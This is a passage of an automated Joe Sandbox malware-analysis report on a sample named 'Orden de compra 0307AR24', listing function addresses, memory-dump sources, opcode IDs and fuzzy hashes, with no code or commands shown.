                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fb01a39198ca15df27f11d00ff5a75daf3b1a5b0f4c105397c7d18a7c41af547
                                            • Instruction ID: 00e8970afe131fea937c5615b31c660d02067674c055614d643245f39b1f3104
                                            • Opcode Fuzzy Hash: fb01a39198ca15df27f11d00ff5a75daf3b1a5b0f4c105397c7d18a7c41af547
                                            • Instruction Fuzzy Hash: 08219374A00908DFD718CF6AE284999BBF5FF9C300B6281D8D4499B366DB71EE11DB04
                                            Function 02BED006 Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163845480.0000000002BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2bed000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10b1580682a29d18237b440c20cf9792b1bc0f5c78e97c87252a58514c8712a7
                                            • Instruction ID: 0071552917aada6cdbee8e808377d8bf2b4ae7b95cc4281d524f8cac69810032
                                            • Opcode Fuzzy Hash: 10b1580682a29d18237b440c20cf9792b1bc0f5c78e97c87252a58514c8712a7
                                            • Instruction Fuzzy Hash: 552181755093808FCB16CF20D9A4B15BF71EB45214F28C5EAD8498B6A7C37AD80ACB62
                                            Function 058BC3C8 Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 380832e9dc7c5ac8c91713c5c4fb136cec4626f8f8bacd82293ebde340b2bd1f
                                            • Instruction ID: 5859a8747bb9107c801112a21a11f918840379835c1c24feebb963b41ca8317f
                                            • Opcode Fuzzy Hash: 380832e9dc7c5ac8c91713c5c4fb136cec4626f8f8bacd82293ebde340b2bd1f
                                            • Instruction Fuzzy Hash: 7511C675B0021A5B9B11DA799C446FFB7FBFBC8260B144A29E829D3344EFB09D058B61
                                            Function 058BBEF0 Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ca76ed6de806d47e9f49e70974c6215c1678605200542df806e9b3a738b034d0
                                            • Instruction ID: 83ba34973728eae1b403ba11de2b56d45dee852d013584c515a8f9937c543f61
                                            • Opcode Fuzzy Hash: ca76ed6de806d47e9f49e70974c6215c1678605200542df806e9b3a738b034d0
                                            • Instruction Fuzzy Hash: 9C112E31F0024A8BDB54EBB999105FEB7F6BFC9211B10406AC905EB344EB719E06CBA1
                                            Function 058BC194 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a94c0d78723e6050a4300cf1bfd37cd866f6d31bb4ad28c4db559ff084c9d1f
                                            • Instruction ID: 60da096c7a5e51030b44e528ca89ef15a489ff8542e26de7bd2aafb510dab8b5
                                            • Opcode Fuzzy Hash: 9a94c0d78723e6050a4300cf1bfd37cd866f6d31bb4ad28c4db559ff084c9d1f
                                            • Instruction Fuzzy Hash: A721C2B59042499FDB10CF9AD884BDEBBF8FB48320F148429E919A7310D375A954CFA5
                                            Function 02BDD4BF Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163740547.0000000002BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2bdd000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                            • Instruction ID: fc2e9043bf3818ed72f7ee026d2c36ecab71c5a746245b0d45d1d2c87aaf4625
                                            • Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
                                            • Instruction Fuzzy Hash: D011D376504281DFCB15CF10D5C4B56BF71FB84318F24C6A9D8490B657C33AD456CBA1
                                            Function 058BFCC8 Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bcd013747543d9587a5abcb41876dfa23e2ff10a023f6872ed98edc1b5b75b29
                                            • Instruction ID: a747aa8eb59b9559a0e84f2b93c9c02683796047c9e0dd8d7de4315e1db40e8a
                                            • Opcode Fuzzy Hash: bcd013747543d9587a5abcb41876dfa23e2ff10a023f6872ed98edc1b5b75b29
                                            • Instruction Fuzzy Hash: 76111970E0121ACFDB18DFA9C444AAEF7F1AF48310F198069D819EB321D7789D02CB91
                                            Function 02BED1CF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163845480.0000000002BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2bed000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                            • Instruction ID: 5885d6f4033669adf81aa400cb90fc1c70f486e857f7de6c3d6bc2b7d181aee5
                                            • Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
                                            • Instruction Fuzzy Hash: 8F118B75504284DFCB15CF10D5C4B15BBA1FB84218F24C6A9D88A4B696C37AD44ACB61
                                            Function 058B88A0 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1994e16e4d0d46459624894a38b305d865417c401bbad3bd0eee660096fc0591
                                            • Instruction ID: eb6bbdd8aa801587a830f037438dd52a324a8dc803912738c7535ae1e788c09a
                                            • Opcode Fuzzy Hash: 1994e16e4d0d46459624894a38b305d865417c401bbad3bd0eee660096fc0591
                                            • Instruction Fuzzy Hash: 36012231B082045FDB09E77988142AF3FDB9FC9214F5880B9D50A9B392ED348C478BD2
                                            Function 058BE390 Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7cd517313b91f47644be8abec1888182e97813cb975c261348f8f4a7136dc32c
                                            • Instruction ID: 3360660100f017f5a041fb0a99cac1c20f6166450583257ace74516aab286c65
                                            • Opcode Fuzzy Hash: 7cd517313b91f47644be8abec1888182e97813cb975c261348f8f4a7136dc32c
                                            • Instruction Fuzzy Hash: 11019E30758644CFE315CB28C855BA97BAABF8A300F1980E6E515CF3B2CA66DC41CB12
                                            Function 058B8DC9 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 43f8d9b5c9df6b458a6ad7145ce7b1d5c943ce96c33203fa6863714d014a8b46
                                            • Instruction ID: e458bd02ffd2aca0e814b8f1158394039a747fb93c12c462a085de0f38f9d6c8
                                            • Opcode Fuzzy Hash: 43f8d9b5c9df6b458a6ad7145ce7b1d5c943ce96c33203fa6863714d014a8b46
                                            • Instruction Fuzzy Hash: 65014F343046118FE725AB69D850ABAB3AFBFC4610B18C56DD956CB351DBB2DC42CF90
                                            Function 058B8DD8 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33aae9aa11df043f5b833b6742e28b6f293d638f3b9de8505a31303413c9516c
                                            • Instruction ID: b3c421580f186efe8cac5c899f6b64f559be5028240a4cde21976e837982895b
                                            • Opcode Fuzzy Hash: 33aae9aa11df043f5b833b6742e28b6f293d638f3b9de8505a31303413c9516c
                                            • Instruction Fuzzy Hash: 3C0162343042058FEB24A669D810A6BB39FBFC0610714C46DD946CB354DFB2DC428F95
                                            Function 02BDD759 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163740547.0000000002BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2bdd000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ddb8bb123d201ff349ae817d21eb21610f40e15453eb920d1e040b3a22c73b2
                                            • Instruction ID: e999fd2d9744e6e9f4daa63861ed5f84b1185642bb3ef20f8b948f57ed990494
                                            • Opcode Fuzzy Hash: 5ddb8bb123d201ff349ae817d21eb21610f40e15453eb920d1e040b3a22c73b2
                                            • Instruction Fuzzy Hash: E5012B72005306DBE7208B65CCC0BA7FF98EF41224F1885DAED494A286D338D881C671
                                            Function 058B97C1 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d17a684555b1399d6e102fe4bb8bcf0c7639af41f45f00548e389be570890652
                                            • Instruction ID: 25edb3f9819996294ffba4a5d0124306355c9ae4f81a6b0d795146e20c22010e
                                            • Opcode Fuzzy Hash: d17a684555b1399d6e102fe4bb8bcf0c7639af41f45f00548e389be570890652
                                            • Instruction Fuzzy Hash: 8D01F471B0010ADFD744DA78E518A9A7BEBDBC9212B048839E70ACB3A5CF34ED438751
                                            Function 058B8180 Relevance: .0, Instructions: 42COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 599470852fd75b27d793406690e0eefcd2cfe2b4ca1785ca5aaacbbcce904059
                                            • Instruction ID: b20c347606271d5d417519bbaca68f8030cfffab81e6aeb9520a5420972ba89c
                                            • Opcode Fuzzy Hash: 599470852fd75b27d793406690e0eefcd2cfe2b4ca1785ca5aaacbbcce904059
                                            • Instruction Fuzzy Hash: 8E01A7307053508FE729DF2CC458A96BBE9BF42300F04456DD88ACB760DA71AC45CF41
                                            Function 058B8D40 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b98822a0cd0075b36f9ad2a91fba30aae2858754a2cf652c3dfbdb95d18f3df0
                                            • Instruction ID: db31333a7bfed4faf6283addc999b94fad936dc8776d2b59702378a8b1ec8466
                                            • Opcode Fuzzy Hash: b98822a0cd0075b36f9ad2a91fba30aae2858754a2cf652c3dfbdb95d18f3df0
                                            • Instruction Fuzzy Hash: 04018F34204201CFD714DB68D544FB5B3AABF85220B68C5AAD949CB765DBB0DC46CF50
                                            Function 058B8D50 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3e12235856292bb2d442dfe45abe88779a4ee857c099c322621165de2c8d083
                                            • Instruction ID: 7d03b74d42bd0032378d6c1ad77510e297ec3379f61001cc0179875548b97bc5
                                            • Opcode Fuzzy Hash: a3e12235856292bb2d442dfe45abe88779a4ee857c099c322621165de2c8d083
                                            • Instruction Fuzzy Hash: 9F014B34204601CFD714DB29D844E66B3AEFF85220B68856AD90AC7365DBB1EC428F90
                                            Function 058B97C8 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b0d24773785b357ef51180dfd15cc5220c2d4626bebf08a82d54c082d9e9cd1
                                            • Instruction ID: 1da915e95de344be9c1dfd4d016fdcc8274424663554ba0d9c76dc5caf2375cf
                                            • Opcode Fuzzy Hash: 4b0d24773785b357ef51180dfd15cc5220c2d4626bebf08a82d54c082d9e9cd1
                                            • Instruction Fuzzy Hash: FD01C271B0050ADFD744DA78E508A9A7BEBDBC9252B044839E70ACB7A5DF34ED438750
                                            Function 058BC93C Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93015c14334022af317a31363f5a3108f243ef9b01885392977dd28f0746226b
                                            • Instruction ID: 55738ead27ee3a7201a43fc79b50f09a4250ee96605c4b367939efa523011434
                                            • Opcode Fuzzy Hash: 93015c14334022af317a31363f5a3108f243ef9b01885392977dd28f0746226b
                                            • Instruction Fuzzy Hash: D001E97080421ADFFB14CF65C4083ED7BB5BF45350F158669E865EA2A0C7B44E45CF91
                                            Function 058BBA20 Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c609c7f4a5e5cc751338fc5eb51624bf169fb83b03b3bf5dce06988c105f4ec
                                            • Instruction ID: cf5ad3003e4a3d7b807606aa3354ec31cfd33ec5c2f38c33dffac71e44f4cedd
                                            • Opcode Fuzzy Hash: 9c609c7f4a5e5cc751338fc5eb51624bf169fb83b03b3bf5dce06988c105f4ec
                                            • Instruction Fuzzy Hash: 2EF0847470C0508FC7109B7CA429665BBFE9FC851271400ABE84AC7722DD30CC028BA0
                                            Function 02BDD758 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163740547.0000000002BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2bdd000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 87a81a308289add11ea30770a8fc3cec9c5b39b0c39d55615442d25cd0b7e23e
                                            • Instruction ID: 52c2a8af8f2f18ab456e77538896fc924d9d26f6e78b254ba070124b28f30aed
                                            • Opcode Fuzzy Hash: 87a81a308289add11ea30770a8fc3cec9c5b39b0c39d55615442d25cd0b7e23e
                                            • Instruction Fuzzy Hash: 2AF09676405344DEE7208B1ADCC4BA6FFA8EF41635F18C59AED484F286D3799844CBB1
                                            Function 058BC9DA Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 17bf1095043f6eb8d2151939af9198824b1f874b134ff15f8687932cc6303d08
                                            • Instruction ID: c768de7712ef9e47ba0232b09a78e8ae2e1902dfdb6d507171390985d1b49d22
                                            • Opcode Fuzzy Hash: 17bf1095043f6eb8d2151939af9198824b1f874b134ff15f8687932cc6303d08
                                            • Instruction Fuzzy Hash: 03F082767041546FD3048B6A9884E7BABE9FBCC2607158179F548C7311D9304C01CB60
                                            Function 058B8308 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b519c574dde9b929ae77201a9a1d5fe06a02f84045ff5a3f1c4c0bdd8237b78
                                            • Instruction ID: 267845fe41f343734ca97d1910071d5f4f84a7ec19b479841815f25bfdc62ce6
                                            • Opcode Fuzzy Hash: 9b519c574dde9b929ae77201a9a1d5fe06a02f84045ff5a3f1c4c0bdd8237b78
                                            • Instruction Fuzzy Hash: 37F06D7295010A8FDB50DFA8C8817BDB7E4FB04300F4489B6D458D3241EA79EA05CB80
                                            Function 058BC948 Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 56cb1fb9f014fc09cce4451e4f55baa3d038a632ccdcdb3662c3c831bed55ef0
                                            • Instruction ID: e979e89597eca78b8563a7f5abb58d742db21e978b4382a1a636f8324db7b901
                                            • Opcode Fuzzy Hash: 56cb1fb9f014fc09cce4451e4f55baa3d038a632ccdcdb3662c3c831bed55ef0
                                            • Instruction Fuzzy Hash: E301E87080021ADFFB14CF6AC4083EEBBF5BF49350F108225E865EA2A0D7B44E40CB91
                                            Function 058BBA30 Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 63a6ef517c4f91d917d67f4d412864ff781b630c9a65207a5deb45848617c41c
                                            • Instruction ID: 5faedcf83582ff61324b7f4b5d02708a3ceb03a040b16024192e616a1e488bd7
                                            • Opcode Fuzzy Hash: 63a6ef517c4f91d917d67f4d412864ff781b630c9a65207a5deb45848617c41c
                                            • Instruction Fuzzy Hash: 53F0EC71B15115CF9B1496BDA41891A77EF9FC8522314507BE90ACB725DD74CC0287B1
                                            Function 058BC9E8 Relevance: .0, Instructions: 32COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9d86be89bdaeb5e57a075a5f39792f2f445c7ca6d933ade0618a29295cbdd095
                                            • Instruction ID: e9f0ae82492bafd3c23de9e14865d4d713101e47a2e403f99c8c7402511f2fe2
                                            • Opcode Fuzzy Hash: 9d86be89bdaeb5e57a075a5f39792f2f445c7ca6d933ade0618a29295cbdd095
                                            • Instruction Fuzzy Hash: F6E03976B042286F93049AAAD884D6BBBEEEBCC660311807AE548C7314D9319C01C6A0
                                            Function 058B81A8 Relevance: .0, Instructions: 31COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 49d211ed3ff86381a52666f5b89555b62033bd43c44ae5935b498b7826893619
                                            • Instruction ID: f88bb4b7934466c235a6edfe3e63ea4a31ba3a138c28030b3a29e2d753b46a38
                                            • Opcode Fuzzy Hash: 49d211ed3ff86381a52666f5b89555b62033bd43c44ae5935b498b7826893619
                                            • Instruction Fuzzy Hash: B4F03A307057108FE728EA298848A97B7EDBF45615B08846ED84AC7720DAB1EC40CF96
                                            Function 058BDF90 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9d12eed9e1e36b5c58cb752d4624f4f89b4d9c02e9d754fe0786ab709b69195
                                            • Instruction ID: 4429c03d52c8d84d9715ec41cd5b3f8931bff1838f1b972c65d836d3ec98d3b9
                                            • Opcode Fuzzy Hash: c9d12eed9e1e36b5c58cb752d4624f4f89b4d9c02e9d754fe0786ab709b69195
                                            • Instruction Fuzzy Hash: 61F03AB0D0420ADFDB54DFA9D841BAEBBF8BB08300F0045A9E908E7300D77499018B91
                                            Function 058B8E58 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c11a674d385eeefb856fce38e736d2fd6d707160c76f113c5e02e0cefa316651
                                            • Instruction ID: a6066379e856dc6fa3506c8dbab5617bedf74dbc8f608a230d158f78866be531
                                            • Opcode Fuzzy Hash: c11a674d385eeefb856fce38e736d2fd6d707160c76f113c5e02e0cefa316651
                                            • Instruction Fuzzy Hash: 55F096729442964FDB61CB68CC427AC7BA1AB01211F1881F6D864DB692E63D9606C741
                                            Function 058B9768 Relevance: .0, Instructions: 26COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7255c05dfcb76fa54352cbadc494bc5b0c80fa8ac62d88f860cf0de32fed26eb
                                            • Instruction ID: a0cdcef0e1acc60e5ed1846e930de29aa8c1b8fb7654628fab8d6077a74e275a
                                            • Opcode Fuzzy Hash: 7255c05dfcb76fa54352cbadc494bc5b0c80fa8ac62d88f860cf0de32fed26eb
                                            • Instruction Fuzzy Hash: 3AE092B53054588FC700DBB9A404A553BF7FB8D51171084A8F54AC737ADA28DC029B60
                                            Function 058BCA3A Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bed39d51640921acfc26320a223e3ad9ca14f30ad8fe71febcb232cf5bc23564
                                            • Instruction ID: a5e34d8dc8c316c3f25ecc766120131f6fe6d967ba9bb15ac5ccd9f9cafd9919
                                            • Opcode Fuzzy Hash: bed39d51640921acfc26320a223e3ad9ca14f30ad8fe71febcb232cf5bc23564
                                            • Instruction Fuzzy Hash: 97E0CD363005045FC310CB69D804D55BBE9EFDD721B05806AF606C7321CA71DC01CB58
                                            Function 058BCA40 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a6903231deb41e237224b330b18e80c13762337c6689156841d4d18d18e33ff
                                            • Instruction ID: 18d891612bbd9ebfd4e7ba32b124740b92cde653dabcba15b97c1720f39b5229
                                            • Opcode Fuzzy Hash: 2a6903231deb41e237224b330b18e80c13762337c6689156841d4d18d18e33ff
                                            • Instruction Fuzzy Hash: 48D012363005149FC3149A5AD804D46BBE9EFD9721B15806AF60AC7361CA71EC01CA94
                                            Function 058BDF38 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2169698771.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_58b0000_Orden de compra 0307AR24.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ec55b6335a7f2f74ccec202e8c635389e052ce7c8bb764f2129d62c0d4f22f2
                                            • Instruction ID: 959fb4fb9f5edff3584a67e2ea96f6f11b145968862b498c3ae1aa1763bdf84c
                                            • Opcode Fuzzy Hash: 3ec55b6335a7f2f74ccec202e8c635389e052ce7c8bb764f2129d62c0d4f22f2
                                            • Instruction Fuzzy Hash: 5DE012B0D04209AFD740EFA9C904B9EBBF4AB08600F1085A9C418E7311E7B48A008F80
